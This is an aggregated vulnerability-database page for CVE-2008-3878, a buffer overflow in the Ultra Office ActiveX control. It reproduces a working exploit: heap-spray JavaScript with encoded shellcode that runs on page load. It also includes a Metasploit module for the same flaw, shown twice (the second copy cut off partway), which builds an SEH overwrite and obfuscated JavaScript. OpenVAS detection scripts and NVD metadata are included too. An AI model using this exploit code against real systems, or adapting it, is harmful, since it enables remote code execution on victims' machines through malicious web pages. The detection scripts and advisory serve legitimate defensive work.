Ultra Office ActiveX Control Remote Buffer Overflow Exploit
2008-08-27T00:00:00
ID EDB-ID:6318 Type exploitdb Reporter shinnai Modified 2008-08-27T00:00:00
Description
Ultra Office ActiveX Control Remote Buffer Overflow Exploit. CVE-2008-3878. Remote exploit for windows platform
-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Buffer Overflow
url: http://www.ultrashareware.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.
Tested on a fully patched Windows XP Professional SP3 with Internet Explorer 7
-----------------------------------------------------------------------------
<script language="JavaScript" defer>
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 20000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.HttpUpload(x, x, x);
}
function getsSlide(sSlide, sSlideSize)
{
while (sSlide.length*2<sSlideSize)
{
sSlide += sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sSlide + sCode;
}
</script>
<body onload="JavaScript: return tryMe();">
<object id="boom" classid="clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7">
Unable to create object
</object>
# milw0rm.com [2008-08-27]
{"id": "EDB-ID:6318", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ultra Office ActiveX Control Remote Buffer Overflow Exploit", "description": "Ultra Office ActiveX Control Remote Buffer Overflow Exploit. CVE-2008-3878. Remote exploit for windows platform", "published": "2008-08-27T00:00:00", "modified": "2008-08-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/6318/", "reporter": "shinnai", "references": [], "cvelist": ["CVE-2008-3878"], "lastseen": "2016-02-01T00:37:47", "viewCount": 6, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2016-02-01T00:37:47", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3878"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:86916"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ULTRAOFFICE_HTTPUPLOAD"]}, {"type": "exploitdb", "idList": ["EDB-ID:16513"]}, {"type": "openvas", "idList": ["OPENVAS:900208", "OPENVAS:1361412562310900208"]}], "modified": "2016-02-01T00:37:47", "rev": 2}, "vulnersScore": 9.3}, "sourceHref": "https://www.exploit-db.com/download/6318/", "sourceData": "-----------------------------------------------------------------------------\n Ultra Office ActiveX Control Remote Buffer Overflow\n url: http://www.ultrashareware.com\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://www.shinnai.net\n\n This was written for educational purpose. 
Use it at your own risk.\n Author will be not responsible for any damage.\n\n Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7\n-----------------------------------------------------------------------------\n<script language=\"JavaScript\" defer>\n var sCode = unescape(\"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800\" +\n \"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A\" +\n \"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350\" +\n \"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40\" +\n \"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000\" +\n \"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040\" +\n \"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD\" +\n \"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40\" +\n \"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18\" +\n \"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0\" +\n \"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B\" +\n \"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24\" +\n \"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9\" +\n \"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C\" +\n \"%u652E%u6578%u9000\");\n var sSlide = unescape(\"%u9090%u9090\");\n var heapSA = 0x0c0c0c0c;\n function tryMe()\n {\n var buffSize = 20000;\n var x = unescape(\"%0c%0c%0c%0c\");\n while (x.length<buffSize) x += x;\n x = x.substring(0,buffSize);\n boom.HttpUpload(x, x, x);\n }\n function getsSlide(sSlide, sSlideSize)\n {\n while (sSlide.length*2<sSlideSize)\n {\n sSlide += sSlide;\n }\n sSlide = sSlide.substring(0,sSlideSize/2);\n return (sSlide);\n }\n var heapBS = 0x400000;\n var sizeHDM = 0x5;\n var PLSize = (sCode.length * 2);\n var sSlideSize = heapBS - (PLSize + sizeHDM);\n var heapBlocks = (heapSA+heapBS)/heapBS;\n var memory = new Array();\n sSlide = getsSlide(sSlide,sSlideSize);\n for (i=0;i<heapBlocks;i++)\n {\n 
memory[i] = sSlide + sCode;\n }\n </script>\n <body onload=\"JavaScript: return tryMe();\">\n <object id=\"boom\" classid=\"clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7\">\n Unable to create object\n </object>\n\n# milw0rm.com [2008-08-27]\n", "osvdbidlist": ["47866"]}
{"cve": [{"lastseen": "2020-10-03T11:51:01", "description": "Stack-based buffer overflow in the Ultra.OfficeControl ActiveX control in OfficeCtrl.ocx 2.0.2008.801 in Ultra Shareware Ultra Office Control allows remote attackers to execute arbitrary code via long strUrl, strFile, and strPostData parameters to the HttpUpload method.", "edition": 3, "cvss3": {}, "published": "2008-09-02T15:41:00", "title": "CVE-2008-3878", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3878"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:ultrashareware:ultra_office_control:2.0.2008.801"], "id": "CVE-2008-3878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3878", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ultrashareware:ultra_office_control:2.0.2008.801:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:17:51", "description": "", "published": "2010-03-05T00:00:00", "type": "packetstorm", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3878"], "modified": "2010-03-05T00:00:00", "id": "PACKETSTORM:86916", "href": "https://packetstormsecurity.com/files/86916/Ultra-Shareware-Office-Control-ActiveX-HttpUpload-Buffer-Overflow.html", "sourceData": "`## \n# $Id: ultraoffice_httpupload.rb 8705 2010-03-04 06:19:37Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and 
commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in Ultra Shareware's Office \nControl. When processing the 'HttpUpload' method, the arguments are concatenated \ntogether to form a command line to run a bundled version of cURL. If the command \nfails to run, a stack-based buffer overflow occurs when building the error \nmessage. This is due to the use of sprintf() without proper bounds checking. \n \nNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload \ninto memory unmodified. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'shinnai', 'jduck' ], \n'Version' => '$Revision: 8705 $', \n'References' => \n[ \n[ 'CVE', '2008-3878' ], \n[ 'OSVDB', '47866' ], \n[ 'BID', '30861' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/6318' ] \n], \n'Payload' => \n{ \n'Space' => 4096, \n'BadChars' => \"\\x00\", \n# For HttpUpload args: \"\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested with ActiveX v2.0.0.1020 and v2.0.2008.801 \n[ 'Windows Universal', \n{ \n'Ret' => 0x0c0c0c0c # heap sprayed \n# 0x746C15A9 # p/p/r in msls31.dll \n# EEK, Safe SEH! 
0x220118c2 # p/p/r in OfficeCtrl.ocx \n} \n], \n], \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n \n# ActiveX parameters \nprogid = \"Ultra.OfficeControl\" \nclsid = \"00989888-BB72-4E31-A7C6-5F819C24D2F7\" \n \n# Set parameters \nfnname = rand_text_alpha(8+rand(8)) \narg1 = rand_text_alphanumeric(128) \narg2 = rand_text_alphanumeric(4096) * 10 \nseh_offset = 252 \n \n# Build the exploit buffer \nsploit = rand_text_alphanumeric(seh_offset) \nsploit << generate_seh_record(target.ret) \n \n# Encode variables \nsploit = Rex::Text.to_hex(sploit, '%') \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Prepare the heap spray parameters \nspray_addr = target.ret \nspray_num = \"0x%x\" % spray_addr \n \n# Generate the final javascript \njs = %Q| \nfunction #{fnname}() \n{ \ntry { \nvar obj = new ActiveXObject(\"#{progid}\"); \nvar my_unescape = unescape; \nvar shellcode = '#{shellcode}'; \n#{js_heap_spray} \nsprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000); \nvar arg1 = my_unescape(\"#{arg1}\"); \nvar arg2 = my_unescape(\"#{arg2}\"); \nvar sploit = my_unescape(\"#{sploit}\"); \nobj.HttpUpload(arg1, arg2, sploit); \n} catch( e ) { window.location = 'about:blank' ; } \n} \n| \n \n# Obfuscate the javascript \nopts = { \n'Strings' => true, \n'Symbols' => { \n'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit } \n} \n} \njs = ::Rex::Exploitation::ObfuscateJS.new(js, opts) \njs.obfuscate() \n \n# Build the final HTML \ncontent = %Q|<html> \n<head> \n<script language=javascript> \n#{js} \n</script> \n</head> \n<body onload=\"#{fnname}()\"> \nPlease wait... 
\n</body> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \nsend_response_html(cli, content) \n \nhandler(cli) \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/86916/ultraoffice_httpupload.rb.txt"}], "openvas": [{"lastseen": "2017-07-02T21:10:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3878"], "description": "This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.", "modified": "2017-02-20T00:00:00", "published": "2008-09-02T00:00:00", "id": "OPENVAS:900208", "href": "http://plugins.openvas.org/nasl.php?oid=900208", "type": "openvas", "title": "Ultra Office ActiveX Control Multiple Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ultra_office_activex_control_mult_vuln_900208.nasl 5370 2017-02-20 15:24:26Z cfi $\n# Description: Ultra Office ActiveX Control Multiple Vulnerabilities\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Updated By: Sooraj KS <kssooraj@secpod.com> on 2011-07-18\n# - Added null check\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\ntag_impact = \"Successful exploitation will allow execution of arbitrary\n code, stack-based buffer overflow, can overwrite arbitrary files\n on the vulnerable system by tricking a user into visiting a\n malicious website.\n Impact Level : Application\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\n\nA workaround is to Set a kill bit for the CLSID {00989888-BB72-4E31-A7C6-5F819C24D2F7} \";\n\ntag_affected = \"Ultra Office Control 2.x and prior versions on Windows (All).\";\n\ntag_insight = \"Error exists when handling parameters received by the HttpUpload()\n and Save() methods in OfficeCtrl.ocx file.\";\n\n\ntag_summary = \"This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.\";\n\n\nif(description)\n{\n script_id(900208);\n script_version(\"$Revision: 5370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 16:24:26 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-02 07:39:00 +0200 (Tue, 02 Sep 2008)\");\n script_cve_id(\"CVE-2008-3878\");\n script_bugtraq_id(30861);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_family(\"Denial of 
Service\");\n script_name(\"Ultra Office ActiveX Control Multiple Vulnerabilities\");\n\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/31632/\");\n script_xref(name : \"URL\" , value : \"http://www.juniper.net/security/auto/vulnerabilities/vuln30861.html\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\n include(\"smb_nt.inc\");\n include(\"secpod_smb_func.inc\");\n\n if(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n }\n\n name = kb_smb_name();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n port = kb_smb_transport();\n\n if(!port) port = 139;\n\n if(!get_port_state(port))exit(0);\n\n soc = open_sock_tcp(port);\n if(!soc){\n exit(0);\n }\n\n r = smb_session_request(soc:soc, remote:name);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n prot = smb_neg_prot(soc:soc);\n if(!prot)\n {\n close(soc);\n exit(0);\n }\n\n r = smb_session_setup(soc:soc, login:login, password:pass,\n domain:domain, prot:prot);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n\n uid = session_extract_uid(reply:r);\n if(!uid)\n {\n close(soc);\n exit(0);\n }\n\n r = smb_tconx(soc:soc, name:name, uid:uid, share:\"IPC$\");\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n tid = tconx_extract_tid(reply:r);\n if(!tid)\n {\n close(soc);\n exit(0);\n }\n\n r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:\"\\winreg\");\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n pipe = smbntcreatex_extract_pipe(reply:r);\n if(!pipe)\n {\n close(soc);\n exit(0);\n }\n\n r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, 
pipe:pipe);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);\n if(!handle)\n {\n close(soc);\n exit(0);\n }\n\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n key_h = registry_get_key(soc:soc, uid:uid, tid:tid, pipe:pipe,\n key:key, reply:handle);\n if(!key_h)\n {\n close(soc);\n exit(0);\n }\n\n # To get application installed Path.\n enumKeys = registry_enum_key(soc:soc, uid:uid, tid:tid, pipe:pipe, reply:key_h);\n close(soc);\n\n foreach entry (enumKeys)\n {\n if(\"Ultra Office Control\" >< entry)\n {\n appInsLoc = registry_get_sz(item:\"InstallLocation\", key:key + entry);\n if(!appInsLoc){\n exit(0);\n }\n\t\tbreak;\n }\n }\n\n if(!appInsLoc){\n exit(0);\n }\n\n # To Get File Version.\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:appInsLoc);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\",\n string:appInsLoc + \"OfficeCtrl.ocx\");\n\n soc = open_sock_tcp(port);\n if(!soc){\n exit(0);\n }\n\n r = smb_session_request(soc:soc, remote:name);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n prot = smb_neg_prot(soc:soc);\n if(!prot)\n {\n close(soc);\n exit(0);\n }\n\n r = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);\n if(!r)\n {\n close(soc);\n exit(0);\n }\n\n uid = session_extract_uid(reply:r);\n r = smb_tconx(soc:soc, name:name, uid:uid, share:share);\n\n tid = tconx_extract_tid(reply:r);\n if(!tid)\n {\n close(soc);\n exit(0);\n }\n\n fid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file);\n if(!fid)\n {\n close(soc);\n\texit(0);\n }\n\n fileVer = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid);\n close(soc);\n\n if(!fileVer){\n\texit(0);\n }\n\n # Grep for Version <= 2.0.2008.801 \n if(egrep(pattern:\"^([01]\\..*|2\\.0\\.[01]?[0-9]?[0-9]?[0-9]\\..*|2\\.0\\.200[0-7]\" +\n\t\t \"\\..*|2\\.0\\.2008(\\.[0-7]?[0-9]?[0-9]|\\.80[01]))$\", string:fileVer))\n {\n clsid = 
\"{00989888-BB72-4E31-A7C6-5F819C24D2F7}\";\n regKey = \"SOFTWARE\\Classes\\CLSID\\\"+ clsid;\n if(registry_key_exists(key:regKey))\n {\n # Check for Kill-Bit set for ActiveX control\n activeKey = \"SOFTWARE\\Microsoft\\Internet Explorer\\\"+\n \"ActiveX Compatibility\\\" + clsid;\n killBit = registry_get_dword(key:activeKey,\n \t\t item:\"Compatibility Flags\");\n if(killBit && (int(killBit) == 1024)){\n exit(0);\n }\n security_message(0); \n }\n }\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-06T16:47:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3878"], "description": "This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.", "modified": "2019-12-05T00:00:00", "published": "2008-09-02T00:00:00", "id": "OPENVAS:1361412562310900208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900208", "type": "openvas", "title": "Ultra Office ActiveX Control Multiple Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ultra Office ActiveX Control Multiple Vulnerabilities\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900208\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2008-09-02 07:39:00 +0200 (Tue, 02 Sep 2008)\");\n script_cve_id(\"CVE-2008-3878\");\n script_bugtraq_id(30861);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_name(\"Ultra Office ActiveX Control Multiple Vulnerabilities\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/31632/\");\n script_xref(name:\"URL\", value:\"http://www.juniper.net/security/auto/vulnerabilities/vuln30861.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Ultra Office Control, which is prone to\n multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"Error exists when handling parameters received by the HttpUpload()\n and Save() methods in OfficeCtrl.ocx file.\");\n\n script_tag(name:\"affected\", value:\"Ultra Office Control 2.x and prior versions on Windows (All).\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow execution of arbitrary\n code, stack-based buffer overflow, can overwrite arbitrary files on the vulnerable system by\n tricking a user into visiting a malicious website.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\nforeach entry(registry_enum_keys(key:key)) {\n if(entry && \"Ultra Office Control\" >< entry) {\n appInsLoc = registry_get_sz(item:\"InstallLocation\", key:key + entry);\n if(!appInsLoc){\n exit(0);\n }\n break;\n }\n}\n\nif(!appInsLoc){\n exit(0);\n}\n\nfileVer = get_version(dllPath:appInsLoc + \"OfficeCtrl.ocx\");\nif(!fileVer){\n exit(0);\n}\n\nif(egrep(pattern:\"^([01]\\..*|2\\.0\\.[01]?[0-9]?[0-9]?[0-9]\\..*|2\\.0\\.200[0-7]\\..*|2\\.0\\.2008(\\.[0-7]?[0-9]?[0-9]|\\.80[01]))$\", string:fileVer)) {\n\n clsid = \"{00989888-BB72-4E31-A7C6-5F819C24D2F7}\";\n regKey = \"SOFTWARE\\Classes\\CLSID\\\"+ clsid;\n if(registry_key_exists(key:regKey)) {\n activeKey = \"SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\\" + clsid;\n killBit = registry_get_dword(key:activeKey, item:\"Compatibility Flags\");\n if(killBit && (int(killBit) == 1024)){\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T00:02:15", "description": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow. CVE-2008-3878. 
Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3878"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16513", "href": "https://www.exploit-db.com/exploits/16513/", "sourceData": "##\r\n# $Id: ultraoffice_httpupload.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in Ultra Shareware's Office\r\n\t\t\t\tControl. When processing the 'HttpUpload' method, the arguments are concatenated\r\n\t\t\t\ttogether to form a command line to run a bundled version of cURL. If the command\r\n\t\t\t\tfails to run, a stack-based buffer overflow occurs when building the error\r\n\t\t\t\tmessage. 
This is due to the use of sprintf() without proper bounds checking.\r\n\r\n\t\t\t\tNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\r\n\t\t\t\tinto memory unmodified.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'shinnai', 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-3878' ],\r\n\t\t\t\t\t[ 'OSVDB', '47866' ],\r\n\t\t\t\t\t[ 'BID', '30861' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/6318' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4096,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t# For HttpUpload args: \"\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested with ActiveX v2.0.0.1020 and v2.0.2008.801\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0c0c0c0c # heap sprayed\r\n\t\t\t\t\t\t\t# 0x746C15A9 # p/p/r in msls31.dll\r\n\t\t\t\t\t\t\t# EEK, Safe SEH! 
